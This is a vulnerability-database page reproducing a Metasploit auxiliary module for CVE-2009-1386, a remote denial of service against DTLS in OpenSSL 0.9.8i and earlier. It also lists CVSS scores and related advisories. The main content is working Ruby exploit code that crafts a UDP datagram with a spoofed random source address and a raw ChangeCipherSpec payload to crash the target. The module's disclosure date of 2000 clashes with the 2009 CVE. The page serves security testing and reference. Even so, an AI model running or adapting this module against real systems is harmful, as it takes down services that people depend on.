Lucene search
Jon Oberheide <[email protected]>, theLightCosine <[email protected]>MSF:AUXILIARY-DOS-SSL-DTLS_CHANGECIPHERSPEC-HistoryMay 04, 2011 - 7:08 p.m.
OpenSSL DTLS ChangeCipherSpec Remote DoS
2011-05-0419:08:28
Jon Oberheide <[email protected]>, theLightCosine <[email protected]>
www.rapid7.com
8
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
This module performs a Denial of Service Attack against Datagram TLS in OpenSSL version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a ChangeCipherspec Datagram before a ClientHello.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Exploit::Capture
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenSSL DTLS ChangeCipherSpec Remote DoS',
'Description' => %q{
This module performs a Denial of Service Attack against Datagram TLS in OpenSSL
version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a
ChangeCipherspec Datagram before a ClientHello.
},
'Author' => [
'Jon Oberheide <jon[at]oberheide.org>', #original code
'theLightCosine' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2009-1386' ],
[ 'OSVDB', '55073'],
],
'DisclosureDate' => '2000-04-26'))
register_options([
Opt::RPORT(80),
Opt::RHOST
]
)
deregister_options('FILTER','PCAPFILE', 'INTERFACE', 'SNAPLEN', 'TIMEOUT')
end
def run
open_pcap
print_status("Creating DTLS ChangeCipherSpec Datagram...")
p = PacketFu::UDPPacket.new
p.ip_daddr = datastore['RHOST']
p.ip_src = rand(0x100000000)
p.ip_ttl = 44
p.udp_sport = 34060
p.udp_dport = datastore['RPORT'].to_i
p.payload = "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01"
p.recalc
print_status("Sending Datagram to target...")
capture_sendto(p, '255.255.255.255')
close_pcap
end
end
Related
f5
f5
SOL15351 - OpenSSL DTLS ChangeCipherSpec vulnerability CVE-2009-1386
2014-06-19 00:00:00
K15351 : OpenSSL DTLS ChangeCipherSpec vulnerability CVE-2009-1386
2014-06-19 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:42:00
cvelist
cvelist
CVE-2009-1386
2009-06-04 16:00:00
nessus
nessus
OpenSSL 0.9.8 < 0.9.8i Vulnerability
2012-01-04 00:00:00
SuSE 11 Security Update : OpenSSL (SAT Patch Number 990)
2009-09-24 00:00:00
openSUSE Security Update : libopenssl-devel (libopenssl-devel-974)
2009-07-21 00:00:00
ubuntucve
ubuntucve
CVE-2009-1386
2009-06-04 00:00:00
openssl
openssl
Vulnerability in OpenSSL CVE-2009-1386
2009-06-02 00:00:00
nvd
nvd
CVE-2009-1386
2009-06-04 16:30:00
packetstorm
packetstorm
OpenSSL DTLS ChangeCipherSpec Remote Denial of Service
2024-08-31 00:00:00
seebug
seebug
OpenSSL ChangeCipherSpec DTLSๆฅๆๆ็ปๆๅกๆผๆด
2009-06-06 00:00:00
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit
2009-06-05 00:00:00
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit
2014-07-01 00:00:00
prion
prion
Null pointer dereference
2009-06-04 16:30:00
openvas
openvas
Denial Of Service Vulnerability in OpenSSL (Jun 2009) - Linux
2009-06-12 00:00:00
SLES11: Security update for OpenSSL
2009-10-11 00:00:00
Mandrake Security Advisory MDVSA-2009:237 (openssl)
2009-09-28 00:00:00
cve
cve
CVE-2009-1386
2009-06-04 16:30:00
debiancve
debiancve
CVE-2009-1386
2009-06-04 16:30:00
zdt
zdt
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit
2009-06-04 00:00:00
exploitpack
exploitpack
OpenSSL 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service
2009-06-04 00:00:00
exploitdb
exploitdb
OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service
2009-06-04 00:00:00
ubuntu
ubuntu
OpenSSL vulnerabilities
2009-06-25 00:00:00
osv
osv
openssl - cryptographic weakness
2009-09-15 00:00:00
securityvulns
securityvulns
Multiple OpenSSL DoS conditions
2009-06-25 00:00:00
[USN-792-1] OpenSSL vulnerabilities
2009-06-25 00:00:00
debian
debian
[SECURITY] [DSA 1888-1] New openssl packages deprecate MD2 hash signatures
2009-09-15 21:37:22
oraclelinux
oraclelinux
openssl security, bug fix, and enhancement update
2009-09-08 00:00:00
redhat
redhat
(RHSA-2009:1335) Moderate: openssl security, bug fix, and enhancement update
2009-09-02 09:47:12
centos
centos
openssl security update
2009-09-15 18:42:01
vmware
vmware
ESX Service Console and vMA third party updates
2010-03-03 00:00:00
ESX Service Console and vMA third party updates
2010-03-03 00:00:00
ESXi utilities and ESX Service Console third party updates
2010-05-27 00:00:00
lenovo
lenovo
Intelยฎ PROSet/Wireless WiFi Software Vulnerabilities - Lenovo Support US
2018-11-13 17:10:51
Intelยฎ PROSet/Wireless WiFi Software Vulnerabilities - US
2018-11-13 17:10:51
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
Related for MSF:AUXILIARY-DOS-SSL-DTLS_CHANGECIPHERSPEC-